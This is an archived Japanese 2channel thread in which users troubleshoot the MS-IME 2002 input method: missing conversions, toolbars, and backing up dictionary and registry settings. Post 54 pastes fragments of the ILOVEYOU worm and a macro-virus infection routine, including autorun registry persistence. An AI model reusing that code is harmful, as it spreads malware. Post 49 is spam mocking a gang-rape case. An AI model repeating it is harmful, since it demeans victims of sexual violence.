5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

MS-IME 2002 part2

1 :1:03/05/27 14:12 ID:5MYztSol
IEの日本語入力不可問題、プチフリーズ、変換候補なし問題(もえ[変換]→萌えがない)、
誤変換問題(たか[変換]→胃か)など、Windows日本語版における
数々の重大な不具合の原因となったMS-IME。
果たして調布技術センター7Fの開発体制はどうなっているのか?
インプットメソッドのテスター女どもは職務不履行ではないのか?
aisoftから優秀なWX2のOEM供給を受けたのに、ソフトウェア開発力皆無の
MSKKがバージョンアップの度に改悪しているに過ぎないのではないか?
そんなWindowsの癌であるMS-IMEのスレッドpart2です。
奥村薫についてもここでどうぞ。
http://pc2.2ch.net/test/read.cgi?bbs=win&key=1002846915&ls=50 part1

2 :2:03/05/27 14:16 ID:+UdvPb1E
2

3 ::03/05/27 14:29 ID:c2YxxIQe


4 :名無し~3.EXE:03/05/27 14:38 ID:3MT68REf
4











ハァハァ(*´∀`*)

5 :名無し~3.EXE:03/05/27 14:47 ID:tLuDB1vL
辞書が偏ってる

6 :名無し~3.EXE:03/05/27 15:44 ID:4jnAhk/2
ぴかちゅう

7 :名無し~3.EXE:03/05/27 17:54 ID:ONFVPL4Y
奥村薫ってだれですか?
美人?

8 :名無し~3.EXE:03/05/27 23:36 ID:r3O5r4u6
IE6SP1で日本語が打てないんですが
なぜでしょう?
RealOnPlayerでも同様でした。
OSが2000の方は日本語が打てるのですが・・・

OS/WindowsXPsp1


9 :名無し~3.EXE:03/05/28 00:34 ID:WpLmMpgl
OSをMeから2Kに換えたんだけど、辞書に登録したデータって引き継げないんでしょか?
IMEのフォルダコピーしようとしたら、途中でエラーが出て、出来なかった・・・。

10 :名無し~3.EXE:03/05/28 01:00 ID:6K54/HBM
>>8
IE6>5.01>5.5と思ってるヤツは素人
http://pc2.2ch.net/test/read.cgi/win/1031828708/102

氏ね

11 :9:03/05/28 04:17 ID:WpLmMpgl
解決しました。

12 :山崎渉:03/05/28 16:36 ID:yhp2Rwfc
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

13 :方形厨房:03/05/29 01:05 ID:VnzjMJ1c
先生!質問していいですか。

@ローマ字変換で「え」を入力すると「え^」となります。
 他に例えば「te」とキーを押すと、「て」ではなくて「て^」となります。
 「e」がおかしいようです。他にも「を」を出そうと思って、「wo」と
 入力すると「wお」となり、「w」は入力対象ではないようです。
 なぜですか。

A例えば「長浜」と入力しようとして変換すると、「名がはま」みたいに
 変に部分的に変換されることがあり、変換対象リストにも「長浜」が
 表示されないことがありますが、こういった場合直す方法はありますか?

14 :名無し~3.EXE:03/05/29 11:29 ID:x3reSVDI
>>13丸数字は禁止
1 キーボードの故障
2 辞書学習の故障、学習内容のリセットで直る

15 :名無し~3.EXE:03/05/29 16:58 ID:NatLtiSf
>>13 VNCサーバ+Word2000+IME2000 の環境で前者の状態になったことがある。
VNC落とせば復帰した。参考にならないと思うが。常駐プログラムによってはこんなこともあるってことで。

16 :方形厨房:03/05/30 01:35 ID:7aEEOvFK
>>14 >>15 どうもありがとう。重ねてマル数字失礼しました。

>>14 学習内容のリセットとはどうすればよいのでしょうか。

>>15 私はVNCサーバというのがわからないくらいの方形なので、恐縮ですが
   VNC落とすとはどうしたらよいのでしょうか。確かに使っているのはワード2000です。


17 :名無し~3.EXE:03/05/30 01:43 ID:s4lFwzfl
>>13
2のケースと微妙に違うかもしれないが
漢字の候補がないってのが2002になってから結構起こるよ。
「よしおかみほ」と打つと「よしおかみほ」と「ヨシオカミホ」しかない。
もちろん以前はきちんと漢字が候補にあった。
あとこのようなのがいくつかあったが忘れた。


18 :サンプルです:03/05/30 01:48 ID:YbUWSLPg
★こっそり見せます★
http://endou.kir.jp/betu/linkvp2/linkvp.html

19 :from 15 to 13:03/05/30 02:44 ID:2CHNdZEx
VNC落とす=起動しているVNCサーバー(遠隔操作常駐プログラム)を終了させるという意味で書きました。
VNCサーバーが問題のPCで起動していなければ、直接の関係は無いと思ってもらって良いです。

可能性の一つとして、常駐プログラムをひとつずつ終了させてみてはどうかな?
と言いたかったんです。

(それは無駄に終わるかも知れないが、原因の切り分けの助けにはなると思う)

20 :名無し~3.EXE:03/05/30 04:05 ID:BwWMllzT
>>16
IME2002スタンダードのプロパティーで辞書、学習を開いて修復ボタンを押す、それでダメなら
辞書を開いて学習単語を削除。

21 :方形厨房:03/05/30 09:44 ID:7aEEOvFK
>>19 >>20
お二人ともどうもありがとう。是非両方実行してみます。
なんて親切な人たちだろう。今後何かの機会にまた質問するかもしれませんが、
園と気はどうぞよろしくお願いします。


22 : :03/05/31 00:00 ID:uh1hvFok
                             

23 : :03/06/01 00:00 ID:exNNP8CP
                               

24 :名無し~3.EXE:03/06/01 11:56 ID:E1RvL+zY
名良橋(ならはし)が変換候補に出てこないぞ!
奈良橋じゃねえんだよ。

25 :名無し~3.EXE:03/06/01 13:12 ID:z87uAQCw
MS-IMEを単にIMEと略すやつは素人
その点このスレはGOOD

26 :名無し~3.EXE:03/06/01 16:59 ID:ajUtj7JF
>>24
出ますよ、奈良橋、楢橋、名良橋、楢葉氏

27 :名無し~3.EXE:03/06/01 19:37 ID:WzS348YB
MS-IME2000の辞書ツールを2002に移行するにはどうしたら良いのでしょうか。
dicファイルを書き換えようとすると2000のファイルなので使えないと出てしまいます。

28 :名無し~3.EXE:03/06/01 21:08 ID:jaXc6nG3
ラビットがここでも活きたかw

29 :名無し~3.EXE:03/06/05 20:42 ID:GdJt1V7L
しばらくATOKを使ってて、MS-IME2002もそこそこ
変換効率は良いよと、友人に言われたので試しましたが
大敗でした。やっぱりATOK使っときます。

30 : :03/06/06 00:00 ID:iPzSsdEt
       

31 :名無し~3.EXE:03/06/06 02:57 ID:rLwssFr0
使い込みもしないで何が分かる

32 :名無し~3.EXE:03/06/06 08:26 ID:/WK2jHJH
使い込んだらもっと差が出るぞ

33 :名無し~3.EXE:03/06/08 01:08 ID:cVhOfOoz
前スレでも同じような質問あったけど、変換候補のフォントって
変えられないのかなぁ?

これホントAA描くのに使いづらい…

34 :名無し~3.EXE:03/06/09 05:55 ID:tnIXFpoM
質問です。
私の場合、半角英数が入力出来ないのですけど…

WEBの入力フォームで、他のフォーム部分はいいのですが、
「パスワード」の部分だけがエラー(「半角英数で入力して」のメッセージ)で
帰ってきます。半角で入れてるのに。F10キーとかも試しましたけど。

パスワードのフォームにフォーカスを当てた瞬間、半角英数の表示から、
仮名入力がロックされた表示(赤で不可の状態)になるんです。
で、******…と一応入力自体は出来てる。でもエラー。
宜しく。

35 :名無し~3.EXE:03/06/09 11:28 ID:Y45N6xFA
未確定のフォントを固定

36 :名無し~3.EXE:03/06/10 09:42 ID:ABcxe+6m
海外から日本語入力したいんですが方法ってありますか?

37 :_:03/06/10 09:47 ID:Mg6L24ke
http://homepage.mac.com/hiroyuki44/jaz07.html

38 : :03/06/11 00:00 ID:gv54F8Be
     

39 :名無し~3.EXE:03/06/14 11:28 ID:vQ998fyW
タスクバーに入れるっていうメニューが無くなっちゃったんですけど、どうすればいい?
ナチュラルインプットに変更できなくなっちゃったんですけど、どうすればいい?

IME2000 standard を XPで使っています。


40 :名無し~3.EXE:03/06/14 12:06 ID:vQ998fyW
>>39
IME2002でした。

41 :_:03/06/14 12:20 ID:a6N9aSYT
http://homepage.mac.com/hiroyuki44/jaz03.html

42 :_:03/06/14 12:40 ID:ptR1FEo9
http://homepage.mac.com/hiroyuki44/jaz02.html

43 :名無し~3.EXE:03/06/14 13:46 ID:vIHtNmVr
MS-IME2000で、英語を変換したときに全角候補を出さないように出来ますか?

44 :43:03/06/14 13:51 ID:vIHtNmVr
英語を変換じゃなくて、候補に英語が出る場合、という意味です

45 : :03/06/16 00:00 ID:OsurrLjb
         

46 :名無し~3.EXE:03/06/16 18:07 ID:Ha9CV/Uc
                    \ │ /
                     / ̄\  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                   ─( ゚ ∀ ゚ )< ぶろーばいばるぶぼっくす!
                     \_/  \_________
                    / │ \
                        ∩ ∧ ∧∩ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\ ∩∧ ∧∩\( ゚∀゚)< ぶろーばいばるぶぼっくす!
ぶろーばいばるぶぼっくす! >( ゚∀゚ )/ |    / \__________
    ________/ |    〈 |   |
                  / /\_」 / /\」
                   ̄     / /
                        ̄

47 : :03/06/21 00:00 ID:Idy0XvGM
         

48 :名無し~3.EXE:03/06/24 16:12 ID:oq40PlbQ
質問なんでageます

W2K[SP3]環境でIME2000を使っているんですが、IMEだけ再インストールってできないんですか?
なんか、ツールバーを表示する設定になってるはずなのに、表示されないんです。
だから、タスクバーに入れる設定で使っています。

[選択時] タスクバーに入れる・・・・タスクバーに”あ”と表示される
[非選択時]タスクバーに入れる・・・・タスクバーにもデスクトップにも何も表示されない

49 :名無し~3.EXE:03/06/24 16:13 ID:vSiC9jEf
http://waseda_goookan.tripod.com/swfc.html
都の性欲 flash 爆笑!!!!
http://waseda_goookan.tripod.com/
今回の早稲田大学集団レイプ事件のまとめ

み〜や〜こ〜のせ〜い〜っよっ〜く〜
わ〜れ〜ら〜の〜暴〜行〜〜♪
http://news2.2ch.net/test/read.cgi/newsplus/1056426061/l50
数え切れないほど被害者がいるらしいが泣き寝入りしてしまったらしい
詳しくは本日発売の「FLASH」を参照。
http://www.kobunsha.com/CGI/magazine/hyoji.cgi?sw=index&id=007&date=20030624

50 :名無し~3.EXE:03/06/24 20:00 ID:oq40PlbQ
あげ

51 :名無し~3.EXE:03/06/24 20:18 ID:YhakN9Jr
ほれ
http://www.microsoft.com/downloads/details.aspx?FamilyID=ec882830-4695-4be9-b2bd-a361f7b9fc43&DisplayLang=ja

52 :名無し~3.EXE:03/06/24 22:51 ID:oq40PlbQ
>>51
ほれ?

53 : :03/06/26 00:00 ID:r8J50cgu
                

54 :名無し~3.EXE:03/06/26 00:01 ID:YPuzhasw
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))


55 :名無し~3.EXE:03/06/27 08:02 ID:fMLNTHrX
ATOKだと、読みの分からない字でも文字パレットから
情報として表示することができますが
IME2002は文字の「読み」はどうやればでるんでしょうか?

56 :名無し~3.EXE:03/06/27 08:44 ID:o6Ziq+K7
読みがわからない字をメモ帳などIMEがオンになるところへコピペ

コピペした文字を選択・右クリック

再変換

読み方が表示される



めんどくせーーーーーーーーーー
オレはアフォか

57 : :03/07/01 00:00 ID:COxjJiC3
                       

58 :名無し~3.EXE:03/07/01 05:10 ID:NVJHFdHe
質問です。
WindowsME・IE6SP1・MS-IME2002を使用していますが、
Global IME 東アジア言語のインストールの手順はどのようにすればいいにでしょうか?

59 :名無し~3.EXE:03/07/02 12:21 ID:qmI5Cb/O
WINDOWS98で、IME98についての質問なんですが、こちらでよろしいでしょうか?

サウンドカードのドライバを削除したところ、全く起動出来なくなってしまい、
(SAFEモードも無理)
しかたなくOSの再インストールをしたのですが、
その際、設定が飛んでしまったのか、半角/全角キーを押しても辞書が
立ちあがらなくなってしまいました。

以前は半角/全角キーを押せば辞書が立ちあがり、
英数キーを押すと英字入力に切り替わったのですが、それが不可能になりました。
どうにかして元通りにしたいのですが、方法が分かりません。
何かよい方法はないでしょうか?
もう不便で不便で・・・

60 :名無し~3.EXE:03/07/03 07:22 ID:97TGcwCX
>>58です。
自分で出来ました。

61 :名無し~3.EXE:03/07/03 13:36 ID:lBSwPfJx
WinXPですが中国語繁体字ピンイン入力はどうすればよいでしょうか?
どなたか教えてください。

62 : :03/07/06 00:00 ID:itvcDZgK
          

63 :名無し~3.EXE:03/07/06 09:20 ID:g/PNOPxz
>>59 このケースか?
ttp://homepage2.nifty.com/winfaq/c/trouble.html#277


64 :59:03/07/06 21:05 ID:ptO/ky7J
>>63
情報ありがとうございます。
残念ながら、違うようです。
hot keysではきっちり半角/全角キーになってるみたいなのですが、(レジストリ上は)
半角/全角と英数(Caps)キーが死んでるみたいなんです。
IME98の詳細設定のキー設定を変更しても、上記のキーは使えない状況です。
何が壊れたのかサッパリで困ってます。
(´ー`).。oO(半分諦めて変換でIME起動、シフト押しっぱなしで英数に慣れつつある)
なんにしろ、ありがとうございました。恐らく直せないので諦めます。

65 : :03/07/11 00:00 ID:oNlsXy/n
                           

66 :山崎 渉:03/07/15 11:33 ID:PgFZzGxa

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

67 : :03/07/16 00:00 ID:Zmf7ZhM9
                        

68 :名無し~3.EXE:03/07/18 00:12 ID:Bf00YPye
質問があります。
単語、用語の登録をやろうとすると読みの欄に文字が入力できません。
使っているのは、MS-IME2000
OSは、Windows98です。

69 :名無し~3.EXE:03/07/18 00:25 ID:ddiVVT9E

 やっぱ日本語IMEはATOKだな
             ∧_∧
      ∧_∧   (´<_`  )  流石だよな
     ( ´_ゝ`)   /  ⌒i  
 ̄\  /   / ̄ ̄ ̄ ̄/| |   
 ̄ ̄| /   ./  sotec  / | |
 ̄| |(__ニつ/____/  | |____
田| | \___))\  ̄(u ⊃
ノ||| | 

70 :名無し~3.EXE:03/07/20 18:09 ID:is6u0+On
IMEの単語登録データが突然消えた!!

昨夜までは普通に「いい」→(・∀・)イイ!!
で変換してたのに、今日になってその他もろもろ無くなってしまった・・・
なんでだろ?

71 : :03/07/21 00:00 ID:ZYAvGuvz
                          

72 :名無し~3.EXE:03/07/21 17:06 ID:OgPeb2Kv
>>59
もしかして、普通の日本語106キーボード以外のキーボードを使っていませんか?
だとしたら、使っているキーボードに対応したキーボードドライバを組み込めば直りますよ。

「デバイスマネージャ」から「デバイスドライバの更新ウィザード」を起動し、「特定の場所に
あるすべてのドラバの一覧を作成し、インストールするドライバを選択する」を選ぶと、日本
語106キーボードのドライバが二つ表示されるけど、ここで「すべてのハードウェアを表示」
を選択するといろいろなキーボード用のドライバがずらっと出てくるので、使っているキーボ
ードのドライバを選べばOK。

外してたらごめんね。

73 :名無し~3.EXE:03/07/23 21:10 ID:qlk7WqJP


74 :名無し~3.EXE:03/07/27 21:17 ID:HVk8Eu4X
IMEのツールバーってウィンドウ最大化したときの
_□×の左側に来るように置くのが一番邪魔にならないね。

75 :名無し~3.EXE:03/07/28 09:58 ID:/yXPdw07
>>74
素晴らしい!

76 :59:03/07/28 19:53 ID:Xo646bIe
>>72
教えて頂き早速試したのですがダメでした。
ドライバでもないみたいです。
どうもありがとうございました。

77 :ぼるじょあ ◆ySd1dMH5Gk :03/08/02 05:31 ID:HUaFCpOt
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

78 :名無し~3.EXE:03/08/09 10:24 ID:3+NYM0P/
IME2000の”ユーザー辞書”のバックアップ方法は検索すればすぐ出てくるのですが、ローマ字設定や
キー設定などのユーザー定義やIMEの設定全体のバックアップ方法がどこにも紹介されてません。
あんまりローマ字設定やキー設定をいじってる人がいないからだと思われますが、いったい
どのファイル(レジストリ)をバックアップしたらよいのでしょうか?
それとも再インスト後にIMEの設定を復元するのは手作業でやるしかないのでしょうか?

79 :名無し~3.EXE:03/08/09 10:50 ID:WAJ5hWMy
>>78
試してはいないけどレジストリ
HKEY_CURRENT_USER\Software\Microsoft\IMEJP
をエクスポート・インポートすればよさそうな。
とりあえずユーザー二人作って実験してみたら?

80 :名無し~3.EXE:03/08/09 14:41 ID:3+NYM0P/
>>79
すいません、環境書いてませんでしたね、win2000で、そのキー無いんです。
その後自分でちょっと調べてみました。
ローマ字設定で「ぜゎっあ=xqxz」のようにわざと通常の文ではありえない文字に
してレジストリ検索してもヒットしないんで、レジストリではないのかもと思い、
「文字を含むファイル検索」をしたところNTUSER.DATだけがヒットしました。
で、テキストで開いて「ぜゎっあ」を検索するとやはりありました。
真中ぐらいに自分で設定したローマ字がびっしり書き込まれてました。
移植するにはこの部分だけ抜き出してNTUSER.DATを直接書き換えたらできると思い
ます。ちょっと恐いですが(どおりでMSのサポートに質問しても答えられないはずだ)

81 :80:03/08/09 14:55 ID:3+NYM0P/
「移植するにはこの部分だけ」と書きましたが、ローマ字設定の部分だけ
ならどの範囲か分りますが、IME設定全体となるとどこからどこまでを
書き換えたらいいのか分りません。
(項目ごとに見出しがついてたりしませんし区切りもないので)
誰かNTUSER.DATの解析できる人いませんかね?

82 :名無し~3.EXE:03/08/09 15:02 ID:ZODxK+Gt
>>80
NTUSER.DATはレジストリだよ。
レジストリに生な文字で書かれてないだけ。
キー RomaDef で検索。
>>79 のキーに似た部分探せばいいと思う。

83 :80:03/08/09 15:44 ID:3+NYM0P/
>>82
そうなんですか。ありがとうございます。IMEJP で検索したところ4つヒットしたんですが、
IMEの設定を丸ごと写すには4つ全部上書きする必要ありますか?
(RomaDefは2番目以外の3つキーの下位でヒットしました)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ime\Japan\IMEJP
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\IME\JAPAN\IMEJP
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ime\Japan\IMEJP
HKEY_USERS\S-1-5-21-1060284298-1708537768-1202660629-1004\Software\Microsoft\Windows\CurrentVersion\Ime\Japan\IMEJP

84 :名無し~3.EXE:03/08/09 15:46 ID:67O7cXt/
>>83
・現在のユーザーの
・システムの
・デフォルトの(これは要らん)
・一番上と同じはず(要らん)

85 :80:03/08/09 15:49 ID:3+NYM0P/
>>84
即レスありがとうございます。
再インストするときやってみます。

86 :名無し~3.EXE:03/08/09 16:38 ID:stHP+4Vc
>>80
NTUSER.DATってWindows2000だと簡単に読み取れるわけないよね?
回復コンソールでコピーしてから読み取ったのかな?
どっちにしろ、レジストリファイルを直に(バイナリエディタとかで)編集するなんて、
未だかつて誰もやったことないと思うから是非やって動作を報告して欲しかったな。
間違いなくOS起動しなくなると思うけど。

87 :名無し~3.EXE:03/08/09 18:04 ID:3+NYM0P/
>>86
普通にメモ帖で開けましたよ。
但しC:\Documents and Settings\Administrator\NTUSER.DATで
実際に操作してるAdmin権限のユーザーのものではないですが。

88 :名無し~3.EXE:03/08/09 18:16 ID:stHP+4Vc
>>87
スマソ、確かに違うユーザでログインすればNTUSER.DATを開けるみたいだね。
ただ、メモ帳って…

89 : :03/08/11 00:00 ID:2NLUK8oh
                       

90 :山崎 渉:03/08/15 23:26 ID:njqTLecs
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

91 : :03/08/16 00:02 ID:Gt1QlpPc
                      

92 : :03/08/21 00:00 ID:stwtBHrM
         

93 :名無し~3.EXE:03/08/21 01:15 ID:yCVE1jOy
CTRL+F10で出るショートカットメニューのレイアウトがエディタによって違ってしまいました。

普通、IMEパッド、単語登録、プロパティ、辞書ツール…となるのが
最初のIMEパッドだけが抜けて表示されてしまいます。
この状態だとIMEパッド起動のショートカットPも効きません。
解決策ご存知の方いますか?

94 :93:03/08/21 01:21 ID:yCVE1jOy
失礼しました。再起動したら直りました。

95 :名無し~3.EXE:03/08/21 05:35 ID:i9Tlqyhj
XPですがツールバーを移動してると、移動元のバーが消えなくて2個になっちゃいました。
全く消えないんですがどうしたらいいですか?
再起動したらなくなりますけど、、。

96 :名無し~3.EXE:03/08/21 10:32 ID:gUAd3JFI
Win98SEで、MS-IME95をずっと使っていたのですが、OfficeXPをインストールして
MS-IME2002に換えたところ、タスクバーの表示が消えてしまいました。
ワードを起動するとツールバーが出て、ワードを終了するとツールバーは消えて
しまいます。
ブラウザ等他のソフトで日本語入力していても、タスクバーには何も表示されず、
ツールバーも出てきません。

ttp://homepage2.nifty.com/winfaq/c/trouble.html#1017
を読んで、レジストリの「show status」の値を0→1としてみたら、ツールバー
が表示されたのですが、時々消えたりするし、書こうとする場所になかなかカーソル
が行かなかったりと不安定になります。

タスクバーに「あ」と出ていてくれるだけで良いのですが、何か方法は無いのでしょうか?

23 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)